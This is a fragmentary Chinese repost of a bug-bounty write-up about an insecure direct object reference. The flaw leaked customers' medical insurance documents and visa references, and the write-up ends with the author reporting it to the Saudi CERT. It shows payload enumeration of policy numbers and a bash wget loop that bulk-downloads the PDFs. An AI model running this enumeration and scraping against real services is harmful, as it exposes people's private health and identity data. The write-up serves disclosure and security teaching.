前言
https:
//document.example.com/1682425711431052.pdf
我是如何发现漏洞的?
请求:https://www.example.com/zh/AddBenefit/$Payload 有效负载选项:从00000到90000,步长:1
注:我的目的不是要转储所有的医疗文件,但我这样做的攻击只是为了升级的漏洞严重性,实际上有效payload只有100个数字。
policyNumbers.txt
文件中。然后我创建了一个小脚本,它从policyNumbers.txt
文件中获取保单号码,并将其提供给下载医疗保险文档的URL。
#! /bin/bashfor num in `cat policyNumbers.txt`
do
wget
"https://document.example.com/
$num
.pdf"
-O
$num
mv
$num
.pdf files/
done
保险文件中还包含客户的签证参考号,通过沙特外交部网站,可以通过护照号和签证参考号获取客户的签证文件。 签证文件 我通过LinkedIn搜索了他们在这家公司工作的安全团队,告诉他们这个漏洞,但我没有收到他们的任何回应。 最后,我给沙特CERT发了一封电子邮件,报送了这个漏洞。他们联系了该公司修复漏洞。 以上内容由白帽子左一翻译并整理。原文:https://3bodymo.medium.com/idor-leads-to-leak-medical-insurance-documents-8779715074be
声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权!
原文始发于微信公众号(白帽子左一):IDOR导致上万医疗保险文件泄露
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论